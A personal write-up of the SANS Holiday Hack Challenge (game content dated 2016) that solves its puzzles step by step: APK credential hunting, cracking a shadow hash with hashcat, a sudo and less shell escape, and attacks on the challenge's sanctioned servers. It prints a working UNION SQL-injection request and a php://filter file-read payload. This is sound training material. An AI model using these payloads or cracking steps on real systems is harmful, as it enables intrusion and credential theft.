[write-up] SANS Holiday Hack Challenge 2017 - Santa's Business Card

At the end of last year I took some time to have a look at the SANS Holiday Hack Challenge.
You can still play the the challenge under the following URL: https://holidayhackchallenge.com/2016/
The challenge consisted of several tasks including web-security and basic command-line usage. I managed to complete all the tasks so if you are interested how I did it:
Here is my write-up.
__ . *}/ _____ ____________ | | o *Oo °# ______ / | | |___ | |________ _______________ _____ö____| __| / |___ _L____ ___| \|__| | < | .\ | | / /* | \ | | | |/ \| __ | | BUSINESS | Ö\ ~~~ | |___L /_| | \ | | | | ^ \ | |___| | CARD | \ |____ | __ | \| | | | / \ \ |_______ | - | oO \ ~~___ | | / | | |\ V | | | |___| |______ | | A WRITE-UP | * \ | |__| |/ |__| | \ | | | ___ |_ | | | BY | \___| | | | \ | |___| | | | |____| | | DENIS WERNER | |_________| |___| \__| |___| |___| | |______________| |____________| */T/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\T\* */|/ ______ ___ ______ ___________ ______ \|\* */|/ | _ \ / \ | _ \ |___ ____| |___ | _ \|\* */|/ | |_] | / _ \ | |_] | | | | | |_| \|\* */|/ | ___/ / /_\ \ | / | | | | _ \|\* */|/ | | / _____ \ | |\ \____ | | | | |_| \|\* */|/ |__| /__/ \__\ |__| \______| |__| |__| \|\* */|/ \|\* */|/ ---- A Most Curious Business Card ---- \|\* */|/_____________________________________________________________________\|\* */|\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/|\* 1) What is the secret message in Santa's tweets? The secret message inside Santa's tweets is: BUG BOUNTY After looking at the tweets by hand for a while I couldn't figure out a pattern. It proceeded to write a short script to download all the tweets and dump them to a txt file which proved to be a smart move. Written one below the other the secret message appeared. Here is the first letter, the letter B: GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ CHRISTMASHOHOHOELFQQ...............dQ,..........&GOODWILLTOWARDSMENHOHOHOQQ GOODWILLTOWARDSMENQQL.............&QQm,........_HOHOHOHOHOHOCHRISTMASELFELF SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH 2) What is inside the ZIP file distributed by Santa's team? Aah, the ZIP file. I see. Yes, inside the ZIP file is. Well, there is ... wait a minute ... What ZIP file are we talking about? Visiting Santa's Twitter page or looking at his business card we can find another link. It points to his Instagram page at: https://www.instagram.com/santawclaus/ Looking through the pictures we can find one that shows a desk and a screen. After downloading the high resolution picture Santa's desk we can see that the top of the screen reads: -DestinationPath SantaGram_v4.2.zip *!* We now know the filename! *!* Also included in the picture is a nmap printout for the host: www.northpolewonderland.com This host is also where we can download the ZIP file: www.northpolewonderland.com/SantaGram_v4.2.zip The ZIP file itself is protected by a password. The secret from the tweets should help! BUG BOUNTY Nope. Bug Bounty Nah. BUGBOUNTY Are you serious? No! BugBounty Neither. bug bounty Not this time little elf! bugbounty The password "bugbounty" finally unlocks the archive. Inside the archive we can find a .apk file - an android applikation. Opening the app in a emulator we can see that it contains the SantaGram app. _____________________________________________________________________________ */T/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\T\* */|/ ______ ___ ______ ___________ ____ \|\* */|/ | _ \ / \ | _ \ |___ ____| |__ \ _ \|\* */|/ | |_] | / _ \ | |_] | | | ] | |_| \|\* */|/ | ___/ / /_\ \ | / | | / / _ \|\* */|/ | | / _____ \ | |\ \____ | | / /____ |_| \|\* */|/ |__| /__/ \__\ |__| \______| |__| |________| \|\* */|/ \|\* */|/ ---- Awesome Package Konveyance ---- \|\* */|/_____________________________________________________________________\|\* */|\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/|\* 3) What username and password are embedded in the APK file? After extracting the files from the .apk file we can search through the content of the files. I used the grep commands: > grep -r username SantaGram_4.2/* -n5 and > grep -r password SantaGram_4.2/* -n5 to uncover a file that held both the username and the password. These were: username: guest password: busyreindeer78 4) What is the name of the audible component (audio file) in the SantaGram APK file? With the help of the find command we can locate all mp3 files that might hide in the apk. > find SantaGram_4.2/ -iname '*.mp3' SantaGram_v4.2/res/raw/discombobulatedaudio1.mp3 This name of the audible component is "discombobulatedaudio1.mp3" _____________________________________________________________________________ */T/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\T\* */|/ ______ ___ ______ ___________ _____ \|\* */|/ | _ \ / \ | _ \ |___ ____| |__ \ _ \|\* */|/ | |_] | / _ \ | |_] | | | __] | |_| \|\* */|/ | ___/ / /_\ \ | / | | [__ < _ \|\* */|/ | | / _____ \ | |\ \____ | | ______] | |_| \|\* */|/ |__| /__/ \__\ |__| \______| |__| |_________/ \|\* */|/ \|\* */|/ ---- A Fresh-Baked Holiday Pi ---- \|\* */|/_____________________________________________________________________\|\* */|\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/|\* 5) What is the password for the "cranpi" account on the Cranberry Pi system? To ge access to the cranpi image we first had to collect all the parts that were neccessary for the cranberry pi. Unlike the Netwars Coins the parts were rather easy to spot if you walked around the map and closely looked at all the stuff. Having collected all the parts "Holly Evergreen" provided us with a link to the image: https://www.northpolewonderland.com/cranbian.img.zip Inside this ZIP file was a system image. After calculating the correct offset we can mount the image: > sudo mount -v -o offset=70254592 -t ext4 cranbian-jessie.img mnt/ Read the etc/shadow file to uncover the password hash > sudo cat etc/shadow cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7 And run hashcat with the rockyou-wordlist to bruteforce the plaintext password: > oclHashcat64.bin -m 1800 cranpi.txt ~/Dokumente/wordlists/rockyou.txt The password is: yummycookies 6) How did you open each terminal door and where had the villain imprisoned Santa? ____________ | | | TERMINAL 1 | | ~# | __|____________|__ |+ + + + + + + + + | |+ +Elf House #2 + | |__________________| Carefully we approach the first terminal. A window opens: ******************************************************************************* * * *To open the door, find both parts of the passphrase inside the /out.pcap file* * * ******************************************************************************* scratchy@8b44465ac449:/$ We are logged in as the user scratchy and are supposed to read a file. The file is owned by itchy, and we cannot read it. scratchy@8b44465ac449:/$ ls -la out.pcap -r-------- 1 itchy itchy 1087929 Dec 2 15:05 out.pcap scratchy@8b44465ac449:/$ cat out.pcap cat: out.pcap: Permission denied Do we have any special privileges for any commands? scratchy@8b44465ac449:/$ sudo -l Matching Defaults entries for scratchy on 8b44465ac449: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User scratchy may run the following commands on 8b44465ac449: (itchy) NOPASSWD: /usr/sbin/tcpdump (itchy) NOPASSWD: /usr/bin/strings Yes. Looks like we can execute strings and tcpdump as the user itchy. Lets do this: scratchy@8b44465ac449:/$ sudo -u itchy strings /out.pcap| grep -x '.\{15,\}' BGET /firsthalf.html HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept-Encoding: identity Host: 192.168.188.130 Connection: Keep-Alive OHTTP/1.0 200 OK OServer: SimpleHTTP/0.6 Python/2.7.12+ ODate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: text/html PContent-Length: 113 PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT DGET /secondhalf.bin HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept-Encoding: identity Host: 192.168.188.130 Connection: Keep-Alive THTTP/1.0 200 OK TServer: SimpleHTTP/0.6 Python/2.7.12+ TDate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: application/octet-stream This looks like there are two HTTP requests made. The first one is plain HTML and contains the first part of the passphrase: "santasli" By modifying the strings command parameters we can receive the second part: scratchy@8b44465ac449:/$ sudo -u itchy strings -el /out.pcap part2:ttlehelper ######################################## # # # The passphrase for this terminal is: # # santaslittlehelper # # # ######################################## ____________ | | | TERMINAL 2 | | ~# | __|____________|__ |+ + + + + + + + + | |+ + WORKSHOP+ + + | |__________________| High above the clouds we enter the workshop. A Terminal near the stairs! ******************************************************************************* * * * To open the door, find the passphrase file deep in the directories. * * * ******************************************************************************* elf@da8dac15f2d6:~$ As the prepared little elf that we are we know our command line tools and know that the find command can be used to search for files only. elf@da8dac15f2d6:~$ find . -type f ./.bashrc ./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt ./.profile ./.bash_logout This second file looks interesting. Copying this filename to the command line will be tricky with all the escaping and stuff. We use a shortcut and use the -exec argument for the find command: elf@da8dac15f2d6:~$ find .doormat -type f -exec cat {} \; key: open_sesame ######################################## # # # The passphrase for this terminal is: # # open_sesame # # # ######################################## ____________ | | | TERMINAL 3 | | ~# | __|____________|__ |+ + + + + + + + + | |+ Santa's Office+ | |__________________| While watching our daily dose of "War Games" from 1983, we enter Santa's Office through the door that was locked by terminal 2. Suddenly the text on the terminal begins to match the plot of the movie. We make sure to enter everything according to the movie. GREETINGS PROFESSOR FALKEN. Hello. HOW ARE YOU FEELING TODAY? I'm fine. How are you? EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73? People sometimes make mistakes. YES THEY DO. SHALL WE PLAY A GAME? Love to. How about Global Thermonuclear War? WOULDN'T YOU PREFER A GOOD GAME OF CHESS? Later. Let's play Global Thermonuclear War. FINE ,------~~v,_ _ _--^\ |' \ ,__/ || _/ /,_ _ / \,/ / ,, _,,/^ v v-___ | / |'~^ \ \ | _/ _ _/^ \ / / ,~~^/ | ^~~_ _ _ / | __,, _v__\ \/ '~~, , ~ \ \ ^~ / ~ // \/ \/ \~, ,/ ~~ UNITED STATES SOVIET UNION WHICH SIDE DO YOU WANT? 1. UNITED STATES 2. SOVIET UNION PLEASE CHOOSE ONE: 2 AWAITING FIRST STRIKE COMMAND ----------------------------- PLEASE LIST PRIMARY TARGETS BY CITY AND/OR COUNTRY NAME: Las Vegas LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: LOOK AT THE PRETTY LIGHTS Press Enter To Continue ######################################## # # # The passphrase for this terminal is: # # LOOK AT THE PRETTY LIGHTS # # # ######################################## ____________ | | | TERMINAL 4 | | ~# | __|____________|__ |+ + + + + + + + + | |+ Workshop #2 + + | |__________________| In the Workshop there is another terminal in the back. We have a look. ******************************************************************************* * * * Find the passphrase from the wumpus. Play fair or cheat; it's up to you. * * * ******************************************************************************* We ain't no cheaters (except if we have to find the last NetWars challenge coins) so we hunt the wumpus through the cave like a maniac. Whenever we can smell it we fire arrows in all directions. We achieve death by the wumpus, death by falling in a hole and get lost in the cave. At some point humongous bats pick me up and drop me in a hole. I die again. Then, suddenly, he is there. The Wumpus. A fight starts and only with the last arrow I am able to kill the beast. But is was no evil: WUMPUS IS MISUNDERSTOOD ######################################## # # # The passphrase for this terminal is: # # WUMPUS IS MISUNDERSTOOD # # # ######################################## ____________ | | | TERMINAL 5 | | ~# | __|____________|__ |+ + + + + + + + + | |+ Train Station + | |__________________| To the right of the workshop and still shaken by the adventures in the cave we enter the Train Station. Next to the waiting train there is a Terminal. Train Management Console: AUTHORIZED USERS ONLY ==== MAIN MENU ==== STATUS: Train Status BRAKEON: Set Brakes BRAKEOFF: Release Brakes START: Start Train HELP: Open the help document QUIT: Exit console Typing HELP puts us in the interactive "less"-command-window. Unknown to some but the prepared elfs is that you can execute any command from within this window. !ls ActivateTrain TrainHelper.txt Train_Console In the "Train_Console" file we can read the password that is used to start the train. PASS="24fb3e89ce2aa0ea422c3d511d40dd84" Another way to start the train is by executing the ActivateTrain binary. Lets do that !./ActivateTrain +-----+ +----+ +------+ X PM +----+ +----+ +------------------------+ DESTINATION TIME | | +-----------------------------------------+ | +XX XX+ | +-----------------------------------------+ | |XXX XXX| | | +-+ XXX XXX +-+ | MONTH DAY YEAR HOUR MIN | XXX XXX | +-----+ +----+ +------+ O AM +----+ +----+ | XXXXX | | DEC | | 14 | | 2016 | | 05 |:| 19 | | XXX | +-----+ +----+ +------+ X PM +----+ +----+ | XXX | PRESENT TIME | XXX | +-----------------------------------------+ | SHIELD EYES FROM LIGHT | +-----------------------------------------+ | XXX | | XX+-+ | MONTH DAY YEAR HOUR MIN | | +-----+ +----+ +------+ O AM +----+ +----+ +------------------------+ | NOV | | 16 | | 1978 | | 10 |:| 21 | +---------+ +-----+ +----+ +------+ X PM +----+ +----+ |ACTIVATE!| LAST TIME DEPARTED +---------+ Press Enter to initiate time travel sequence. --->Activating TIME TRAVEL sequence NOW..... ***** TIME TRAVEL TO 1978 SUCCESSFUL! ***** ######################################## # # # The passphrase for this terminal is: # # 24fb3e89ce2aa0ea422c3d511d40dd84 # # # ######################################## _____________________________________________________________________________ */T/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\T\* */|/ ______ ___ ______ ___________ ____ \|\* */|/ | _ \ / \ | _ \ |___ ____| / | _ \|\* */|/ | |_] | / _ \ | |_] | | | / /. | |_| \|\* */|/ | ___/ / /_\ \ | / | | / /_| |_ _ \|\* */|/ | | / _____ \ | |\ \____ | | |_____ _| |_| \|\* */|/ |__| /__/ \__\ |__| \______| |__| |__| \|\* */|/ \|\* */|/ ---- My Gosh... It's Full of Holes ---- \|\* */|/_____________________________________________________________________\|\* */|\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/|\* 7) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN AT THE NORTH POLE, ATTEMPT TO REMOTELY EXPLOIT EACH OF THE FOLLOWING TARGETS: The Mobile Analytics Server (via credentialed login access) The Dungeon Game The Debug Server The Banner Ad Server The Uncaught Exception Handler Server The Mobile Analytics Server (post authentication) For each of those six items, which vulnerabilities did you discover and exploit? By using extremely sophisticated command-line-foo we manage to extract the hosts from the apk file. grep -r northpolewonderland.com ./* http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5 http://dev.northpolewonderland.com/index.php http://dungeon.northpolewonderland.com/ http://ex.northpolewonderland.com/exception.php https://analytics.northpolewonderland.com/report.php?type=launch We proceeded to get confirmation of Tom Hessman that these are indeed in scope: 104.198.221.240 - Yes! 104.198.221.240 is in scope! [..] 35.184.63.245 - Yes! 35.184.63.245 is in scope! [..] 35.184.47.139 - Yes! 35.184.47.139 is in scope! [..] 104.154.196.33 - Yes! 104.154.196.33 is in scope! [..] 104.198.252.157 - Yes! 104.198.252.157 is in scope! [..] 555555555555555555 | | | AAAA DDD SSSS | | A A D D S | | A A D D SSSS | | AAAA D D S | | A A DDD SSSS | _____|__________________|_____ | | | The Banner Ad Server | | ads.northpolewonderland.com | |______________________________| The Banner Ad Server uses the Meteor Framework. We use the "Meteor Miner" Script, that is described in the Blogpost https://pen-testing.sans.org/blog/2016/12/06/mining-meteor to have a look at the data that is sent to us. While we can only see the normal four quotes on the homepage we see that there is a route to /admin/quotes When we visit this page age hidden quote is transmitted to us. In the developer tools console we can then enter HomeQuotes.find().fetch() to get an array with all the quotes. The last element contains a link to the mp3 file: { _id: "zPR5TpxB5mcAH3pYk", index: 4, quote: "Just Ad It!", hidden: true, audio: "/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3" } 272727272727272727 | | | AAAA N N AAAA | | A A NN N A A | | A A NN N A A | | AAAA N NN AAAA | | A A N NN A A | ________|__________________|________ | | | The Mobile Analytics Server | | analytics.northpolewonderland.com | |____________________________________| ##### # # # 1 # # # ##### We enter the website which prompts us for a username and a password. We use the credentials we found in the apk file and log in. In the menu there is a link to a .mp3 file: /getaudio.php?id=20c216bc-b8b1-11e6-89e1-42010af00008 Which downloads "discombobulatedaudio2.mp3". ##### # # # 2 # # # ##### There is a SQL-injection vulnerability in the type parameter when making a POST request to analytics.northpolewonderland.com/query.php We can use it to read some interesting databases: Database: sprusage Table: audio [4 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | filename | varchar(32) | | id | varchar(36) | | mp3 | mediumblob | | username | varchar(32) | +----------+-------------+ Hmm, a column named filename and one called mp3. I wonder whats in there. filename id username discombobulatedaudio2.mp3 20c216bc-b8b1-11e6-89e1-42010af00008 guest discombobulatedaudio7.mp3 3746d987-b8b1-11e6-89e1-42010af00008 administrator Executing the following request: POST /query.php HTTP/1.1 Accept-language: en-US,en;q=0.5 Accept-encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0 Host: analytics.northpolewonderland.com Referer: https://analytics.northpolewonderland.com/query.php Cookie: AUTH=82532b2136348aaa1fa7dd2243da1cc9fb13037c49259e5ed70768d4e9baa1c80b97fee8bfa52881f878bf7ac49b0953b14348637bec Upgrade-insecure-requests: 1 Content-type: application/x-www-form-urlencoded Content-Length: 159 Connection: close date=2016-12-01&type=usage_reports%60+where+1=0+UNION+ALL+SELECT+filename,id,hex(mp3), username,5 from audio%23&field%5B%5D=udid&modifier%5B%5D=ne&value%5B%5D=1 we are able to get a hex-representation of the mp3 column. If we transform that one to binary data and safe it as a .mp3 file we get an audio file. We can also read the users database and get the Admin login credentials. Database: sprusage Table: users [3 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | password | varchar(128) | | uid | int(11) | | username | varchar(128) | +----------+--------------+ With these we could login as the admin KeepWatchingTheSkies 0 administrator busyreindeer78 1 guest You were also able to download the source code from a publicly accessible .git repository under: https://analytics.northpolewonderland.com/.git/ 444444444444444444 | | | DDD EEEE V V | | D D E V V | | D D EEE V V | | D D E VV | | DDD EEEE VV | _____|__________________|_____ | | | The Debug Server | | dev.northpolewonderland.com | |______________________________| This server doesn't respond with anything when we browse the URL that we found in the .apk file. We can however, from the code in the .apk, see that it is used for some debug functionality. Unfortunately the debug code is disabled in the current version. But we can change the corresponding variable in the source and repackage and resign the apk. With our new apk we can intercept the calls to the server if we use the ChangeProfile function in the app. POST /index.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Android SDK built for x86 Build/MASTER) Host: dev.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 144 {"date":"20161216120546+0100","udid":"d84e659e847146b2", "debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":99515208} The answer from the server looks like that: HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Fri, 16 Dec 2016 11:23:26 GMT Content-Type: application/json Connection: close Content-Length: 250 {"date":"20161216112326","status":"OK","filename":"debug-20161216112326-0.txt", "request":{"date":"20161216120546 +0100", "udid":"d84e659e847146b2","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":99515208,"verbose":false}} Hmm, there is a parameter called "verbose". I wonder what happens if we include it in the request and change it to true POST /index.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Android SDK built for x86 Build/MASTER) Host: dev.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 160 {"date":"20161216120546+0100","udid":"d84e659e847146b2","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":99515208, "verbose":true} The answer is: HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Fri, 16 Dec 2016 11:23:46 GMT Content-Type: application/json Connection: close Content-Length: 726 {"date":"20161216112346","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161216112346-0.txt", "filename.len":26,"request":{"date":"20161216120546+0100","udid":"d84e659e847146b2", "debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":99515208,"verbose":true}, "files":["debug-20161216111702-0.txt","debug-20161216111719-0.txt","debug-20161216111756-0.txt", "debug-20161216111829-0.txt","debug-20161216111841-0.txt","debug-20161216111857-0.txt","debug-20161216112011-0.txt", "debug-20161216112026-0.txt","debug-20161216112034-0.txt","debug-20161216112112-0.txt","debug-20161216112326-0.txt", "debug-20161216112331-0.txt","debug-20161216112346-0.txt","debug-20161224235959-0.mp3","index.php"]} At the very end of the response we can see a list of filenames: ["debug-20161216111702-0.txt","debug-20161216111719-0.txt", "debug-20161216111756-0.txt","debug-20161216111829-0.txt", "debug-20161216111841-0.txt","debug-20161216111857-0.txt", "debug-20161216112011-0.txt","debug-20161216112026-0.txt", "debug-20161216112034-0.txt","debug-20161216112112-0.txt", "debug-20161216112326-0.txt","debug-20161216112331-0.txt", "debug-20161216112346-0.txt","debug-20161224235959-0.mp3","index.php" Including a .mp3 file that we can then download. debug-20161224235959-0.mp3 555555555555555555 | | | EEEE X X EEEE | | E X X E | | EEE XX EEE | | E X X E | | EEEE X X EEEE | __________|__________________|_________ | | | The Uncaught Exception Handler Server | | ex.northpolewonderland.com | |_______________________________________| We don't know a lot about this. Only that there is some endpoint at: http://ex.northpolewonderland.com/exception.php If we request it we get an error: Request method must be POST If we change the request method to POST: Content type must be: application/json If we change the content type: Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump. If we use the "WriteCrashDump" operation: Fatal error! JSON key 'data' must be set. If we set a data key-value pair like that: POST /exception.php HTTP/1.1 Host: ex.northpolewonderland.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 56 Content-Type: application/json {"operation":"WriteCrashDump","data":""} It finally works as we get the answer: HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 15 Dec 2016 12:43:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 81 { "success" : true, "folder" : "docs", "crashdump" : "crashdump-40Aq6Q.php" } Let's try the other operation: POST /exception.php HTTP/1.1 Host: ex.northpolewonderland.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 64 Content-Type: application/json {"operation":"ReadCrashDump", "data":{"crashdump":"40Aq6Q.php"}} That didn't work out: HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 15 Dec 2016 12:50:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 66 Fatal error! crashdump value duplicate '.php' extension detected. We remove the .php: POST /exception.php HTTP/1.1 Host: ex.northpolewonderland.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 70 Content-Type: application/json {"operation":"ReadCrashDump", "data":{"crashdump":"crashdump-40Aq6Q"}} There we go! HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 15 Dec 2016 12:51:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 18 "" If we can read our own file, maybe we can read the exception.php file? We use a php-filter to exclude any php specific inclusion problems: POST /exception.php HTTP/1.1 Host: ex.northpolewonderland.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 112 Content-Type: application/json {"operation":"ReadCrashDump", "data":{"crashdump":"php://filter/convert.base64-encode/resource=./../exception"}} That worked well. We decode the base64 and receive the source code of the page. At the top we can find: "} 333333333333333333 | | | DDD U U N N | | D D U U NN N | | D D U U NN N | | D D U U N NN | | DDD UU N NN | _______|__________________|________ | | | The Dungeon Game | | dungeon.northpolewonderland.com | |___________________________________| For this task we download a custom version of the "dungeon" game. After playing for a while and loosing all hope to ever complete the game we look for another way. What if we have a look at the strings in the binary: > strings ./dungeon [...] THFPOS= %d, THFFLG= %c, THFACT= %c SWDACT= %c, SWDSTA= %d R=%d, X=%d, O=%d, C=%d V=%d, A=%d, M=%d, R2=%d MBASE=%d, STRBIT=%d VL# OBJECT PROB OPPS BEST MELEE Flag #%-2d = %c Parse vector= %6d %6d %6d %c %6d Play vector= %6d %6d %c State vector= %6d %6d %6d %6d %6d %6d %6d %6d %6d %6d %6d Scol vector= %6d %6d %6d Old= %c New= Valid commands are: AA- Alter ADVS DR- Display ROOMS AC- Alter CEVENT DS- Display state [...] Well that looks like some debug mode. It matches code on the web like that one: https://github.com/GOFAI/dungeon/blob/master/src/gdt.f Turns out that there is a built-in debug mode that can be accessed by entering "gdt". >./dungeon Welcome to Dungeon. This version created 11-MAR-78. You are in an open field west of a big white house with a boarded front door. There is a small wrapped mailbox here. >gdt We can now use the dt command to view text-entries from the game. GDT>dt Entry: 1024 The elf, satisified with the trade says - Try the online version for the true prize If we try that online we get the message: GDT>dt Entry: 1024 The elf, satisified with the trade says - send email to "peppermint@northpolewonderland.com" for that which you seek. If we send a mail to the listed address we receive an answer shortly after: You tracked me down, of that I have no doubt. I won't get upset, to avoid the inevitable bout. You have what you came for, attached to this note. Now go and catch your villian, and we will alike do dote. The mail has an attachment. The .mp3 file. 8) What are the names of the audio files you discovered from each system above? There are a total of SEVEN audio files Original APK - discombobulatedaudio1.mp3 The Banner Ad Server - discombobulatedaudio5.mp3 The Mobile Analytics Server (via credentialed login access) - discombobulatedaudio2.mp3 The Mobile Analytics Server (post authentication) - discombobulatedaudio7.mp3 The Debug Server - debug-20161224235959-0.mp3 The Uncaught Exception Handler Server - discombobulated-audio-6-XyzE3N9YqKNH.mp3 The Dungeon Game - discombobulatedaudio3.mp3 _____________________________________________________________________________ 